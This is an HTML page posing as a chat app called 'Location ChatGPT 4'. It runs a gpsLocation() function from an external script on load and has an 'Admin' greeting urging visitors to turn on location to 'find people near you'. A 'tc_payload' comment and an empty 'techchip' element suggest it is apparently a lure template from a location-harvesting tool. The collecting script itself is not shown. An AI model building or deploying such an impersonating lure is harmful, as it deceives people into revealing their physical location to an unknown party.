<!DOCTYPE html>
<html lang="en" >
<head>
  <meta charset="UTF-8">
  <title>Find - people</title>
  <link rel="stylesheet" href="./style.css">

</head>
<body onload="gpsLocation()">
<section class="msger">
  <header class="msger-header">
    <div class="msger-header-title">
      <i class="fas fa-comment-alt"></i> Location ChatGPT 4
    </div>
    <div class="msger-header-options">
      <span><i class="fas fa-cog"></i></span>
    </div>
  </header>

  <main class="msger-chat">
    <div class="msg left-msg">
      <div
       class="msg-img"
       style="background-image: url(https://image.flaticon.com/icons/svg/327/327779.svg)"
      ></div>

      <div class="msg-bubble">
        <div class="msg-info">
          <div class="msg-info-name">Admin</div>
          <div class="msg-info-time"></div>
        </div>

        <div class="msg-text">
          Hi Welcome to Location GPT-4. Turn on your location for find people near you.📍
        </div>
      </div>
    </div>

  </main>

  <form class="msger-inputarea">
    <input type="text" class="msger-input" placeholder="Ask me anything...">
    <button type="submit" class="msger-send-btn">Send</button>
  </form>
</section>
<script  src="./script.js"></script>
<p id="techchip"></p>
<!-- tc_payload -->

</body>
</html>
